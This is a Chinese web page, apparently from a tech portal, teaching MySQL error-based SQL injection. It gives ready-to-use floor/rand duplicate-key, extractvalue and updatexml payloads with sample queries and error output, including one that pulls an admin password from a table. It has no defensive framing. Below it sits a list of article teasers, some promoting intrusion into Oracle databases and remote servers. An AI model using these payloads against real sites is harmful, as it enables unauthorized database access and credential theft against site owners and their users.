mysql注入如何通过floor报错?UpdateXml测试语句是什么?
1、通过floor报错
可以通过如下一些利用代码
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));
举例如下:
首先进行正常查询:
mysql> select * from article where id = 1;
+—-+——-+———+
id | title | content |
+—-+——-+———+
1 | test | do it |
+—-+——-+———+
假如id输入存在注入的话,可以通过如下语句进行报错。
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry ‘5.1.33-community-log1’ for key ‘group_key’
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
例如我们需要查询管理员用户名和密码:
Method1:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry ‘admin8881’ for key ‘group_key’
Method2:
mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry ‘admin8881’ for key ‘group_key’
2、extractvalue测试语句如下
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
实际测试过程
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
ERROR 1105 (HY000): XPATH syntax error: ‘\admin888’
3、UpdateXml
测试语句
and 1=(updatexml(1,concat(0x3a,(select user())),1))
实际测试过程
mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ‘:root@localhost’
oracle数据库学习 谈谈入侵oracle数据库的体会
一、先看下面的一个贴子:Oracle数据库是现在很流行的数据库系统,很多大型网站都采用Oracle,它之所以倍受用户喜爱是因为它有以下突出的特点:1、支持大数据库、多用户的高性能的事务处理。Oracle支持最大数据库
详情2018-01-11 16:24:29责编:llp 来源:驱动管家什么是网络安全域?网络安全域的主要模块
网络安全域是指同一系统内有相同的安全保护需求、相互信任,并具有相同的安全访问控制和边界控制策略的子网或网络,相同的网络安全域共享一样的安全策略。网络安全域从广义上可理解为具有相同业务要求和安全要求
详情2018-03-01 09:44:08责编:llp 来源:驱动管家oracle数据库教程 电脑高手入侵oracle数据库有哪些常用的命令?
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle 请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。1
详情2018-01-13 20:02:40责编:llp 来源:驱动管家为了防止公司存储在u盘的数据遭窃,u盘设置只读方式
但对某些重视信息安全的公司来说,U盘导致数据泄密的威胁很大。由于U盘的介质非常灵活,可以做成手表等非常规形状。还可以通过数码相机,MP3等数码产品来实现,因此使用U盘可以非常方便地把一些重要数据复制出来
详情2018-01-28 15:29:24责编:llp 来源:驱动管家入侵如何在对方的服务器打上微软自家的补丁解决互传文件的问题?
很多朋友利用输入法漏洞通过3389端口入侵别人的服务器时,会发现在连接对方机器后,无法像内网计算机那样可以互传文件,这在很大程度上使入侵后的攻击大打折扣,其实打上微软自家的“补丁”就可以解决这个问题。
详情2018-03-03 08:43:44责编:llp 来源:驱动管家为什么企业数据泄密?要如何防范企业数据泄密?
当前企业信息安全、商业机密保护是国内各行业网络管理的热点,在知识经济时代,商业机密的安全管理至关重要。如何防止员工复制电脑文件到U盘携带出去,如何禁止员工通过QQ发送文件将商业机密发送出去,以及如何禁
详情2018-01-06 16:52:46责编:llp 来源:驱动管家如何进行qq密保设置?qq密保令牌不能使用怎么办?
腾讯公司在2009年5月7日上午9点推出全新的QQ安全中心,特别推出密保令牌服务。密保令牌是二代密保其中的一个密保手段,需要安装在手机上,可以显示6位动态密码。当您成功绑定密保令牌后,令牌将会出现在“统一安
详情2018-01-17 12:20:54责编:llp 来源:驱动管家强化windows server 2003功能的15个步骤
《Hardening Windows》的作者Jonathan Hassell进行了一次检查表式的网上直播,概述了你现在马上可以采取,用以强化Windows Server 2003功能的15个步骤,以更好的应对各种威胁。我们现在就来看看Jonathan的15
详情2018-02-28 19:41:41责编:llp 来源:驱动管家电子邮件系统加密方法 电子邮件加密的一些建议
近几年来,针对公司的间谍活动越来越严重。因此部署某种加密系统以确保窥探者不能从其截获的消息中破译什么内容,或者不能因为电脑被窃取而丢失信息是非常有意义的。不管是客户的数据,雇员数据,知识产权还是财
详情2018-01-26 15:42:15责编:llp 来源:驱动管家数据库web分离有什么好处?如何判断数据库web是否分离?
数据库web分离有什么好处?数据库服务器可以只对WEB服务器提供服务,不至于暴露在互联网中;将网络嗅探,暴力破解的可能性降到最低;数据库服务器可以只提供数据检索服务而不必处理其它服务;数据库服务器不需要
详情2018-02-25 12:58:52责编:llp 来源:驱动管家
- 什么是命令注入攻击?eval注入攻击代码是什么?
- Linux系统的硬件设备驱动的结构讲解
- ipad连不上电脑的情况有什么办法解决
- 存储介质应该怎么选择?存储介质的详细介绍
- 努比亚即将发布全面屏产品N3 最高支持18W快充
- AI研究人员正在重新思考机器人融合人类知识的方式
- 建议将动力电池增值税税率从17%降至11%
- 解决电脑蓝屏死机的方法有哪些?
- 怎么在电脑桌面上创建快捷方式的图标
- 乐视Pro3截图的三种方法 分享3种乐Pro3截屏方法
- lumia 650支持移动4g吗?lumia 650多少钱?
- QQ怎么绑定手机号?QQ号绑定手机教程
- 暴风影音打开文件反应慢怎么办?有什么解决方法
- Serv-u管理端口权限怎么得到?具体实施方法是什么?
- Perforce软件配置管理系统存在空指针漏洞
- win7系统无法安装驱动程序?Win7安装主板驱动的方法
- 小米平板实现导航的方法都有哪些
- Sandisk固态硬盘怎么辨别真假 闪迪固态硬盘真假辨别教程
- 人类要想在火星生活 可能需要改造基因以抵抗有害辐射
- 百度智能音箱raven H已经现货开售 仅售1699元